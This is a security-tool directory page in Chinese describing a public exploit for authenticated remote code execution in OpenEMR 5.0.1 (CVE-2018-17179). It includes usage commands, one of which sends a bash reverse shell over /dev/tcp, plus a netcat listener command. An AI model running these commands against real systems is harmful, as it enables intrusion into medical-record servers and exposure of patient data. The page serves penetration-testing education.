Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-17179-OpenEMR — 针对OpenEMR 5.0.1的认证远程代码执行漏洞利用程序(CVE-2018-17179),支持可定制的命令载荷和反弹shell,用于教育培训性渗透测试。 | Kitploit
工具/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

针对OpenEMR 5.0.1的认证远程代码执行漏洞利用程序(CVE-2018-17179),支持可定制的命令载荷和反弹shell,用于教育培训性渗透测试。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
111年前尚未审核

CVE-2018-17179-OpenEMR

⚠️ 免责声明
本仓库严格仅用于教育和研究目的。
此处提供的信息和代码只能在受控环境(如私有实验机器)中使用。

未经授权对你不拥有或未获得明确测试许可的系统使用此代码是非法且不道德的。
作者对任何滥用或造成的损害不承担任何责任。


🔍 关于漏洞

CVE-2018-17179 影响 OpenEMR,这是一款广泛使用的开源电子病历和诊所管理软件。
rest_routes.php 端点的身份验证机制存在缺陷,允许已认证用户在服务器上执行任意命令。

这可能导致 Web 服务器用户上下文下的远程代码执行 (RCE)。

  • 漏洞类型: 已认证远程代码执行
  • 受影响组件: 通过 rest_routes.php 的 interface/main/main_screen.php
  • 需要认证: ✅ 是
  • 严重性: 严重
  • CVSS 评分: 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

🧾 参考

  • Exploit-DB 条目 – 45161
  • OpenEMR GitHub 仓库
  • CVE 详情 – CVE-2018-17179
  • NVD CVE 报告

🛠 漏洞利用概述

本仓库提供了 Exploit-DB 上公开漏洞的修改版本:

  • 漏洞标题: OpenEMR 5.0.1 – 已认证 RCE
  • ExploitDB ID: 45161
  • 语言: Python 2
  • 需要认证: 是

在此定制化的漏洞利用中:

  • 你可以直接指定命令载荷(例如反弹 shell)。
  • 漏洞利用支持简洁的 CLI 执行,具有灵活性。
  • 敏感字段(如会话 cookie 生成和命令注入逻辑)已从原始版本保留。

💥 演示

🔐 登录页面

针对本地测试 OpenEMR 登录面板:

登录页面


📂 漏洞利用用法

用法:python2 exploit.py <target_url> -u -p -c

示例: python2 exploit.py http:///openemr -u admin -p secretpass -c 'id'

root@kitploit:~

- 确保已安装 Python 2。
- 用户必须能够访问易受攻击的 `rest_routes.php` 端点。

执行漏洞利用

使用 bash 反弹 shell 载荷运行修改后的漏洞利用脚本:

root@kitploit:~
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

漏洞利用输出

第 3 步 – 捕获反弹 Shell

在端口 4444 上运行的 Netcat 监听器成功接收了反弹 shell:

root@kitploit:~
nc -nvlp 4444

漏洞利用输出

📖 Medium 博客

查看我在 Medium 上的详细解析和理论:
👉 阅读 Medium 博客

下载工具